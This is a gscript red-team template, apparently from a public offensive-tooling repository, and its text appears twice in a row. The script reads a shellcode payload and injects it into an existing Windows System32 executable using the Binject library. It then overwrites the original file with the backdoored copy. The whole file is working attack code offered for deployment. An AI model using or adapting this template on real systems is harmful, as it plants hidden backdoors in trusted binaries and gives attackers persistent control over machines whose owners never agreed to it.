ahhh/binjection_example.gs

## binjection_example.gs
// Example gscript template
// Title: Binjection Example
// Author: ahhh
// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
// Gscript version: 1.0.0
// ATT&CK:

//priority:150
//timeout:150
//import:/tmp/loader.bin
//go_import:github.com/Binject/gbj as gbj

function Deploy() {

    var target_path = "C:\\\\Windows\\System32\\target_binary.exe";


    // Getting our asset
    var shellcode = GetAssetAsBytes("loader.bin");
    console.log("errors: "+shellcode[1]);

    var target_file = G.file.ReadFileAsBytes(target_path);
    console.log("errors: "+target_file[1]);

    var injected = gbj.PeBinject(target_file[0], shellcode[0])
    console.log("errors: "+injected[1]);

    errors = G.file.WriteFileFromBytes(target_path, injected[0]);
    console.log("errors: "+errors);

    return true
}
	// Example gscript template
	// Title: Binjection Example
	// Author: ahhh
	// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
	// Gscript version: 1.0.0
	// ATT&CK:

	//priority:150
	//timeout:150
	//import:/tmp/loader.bin
	//go_import:github.com/Binject/gbj as gbj

	function Deploy() {

	var target_path = "C:\\\\Windows\\System32\\target_binary.exe";


	// Getting our asset
	var shellcode = GetAssetAsBytes("loader.bin");
	console.log("errors: "+shellcode[1]);

	var target_file = G.file.ReadFileAsBytes(target_path);
	console.log("errors: "+target_file[1]);

	var injected = gbj.PeBinject(target_file[0], shellcode[0])
	console.log("errors: "+injected[1]);

	errors = G.file.WriteFileFromBytes(target_path, injected[0]);
	console.log("errors: "+errors);

	return true
	}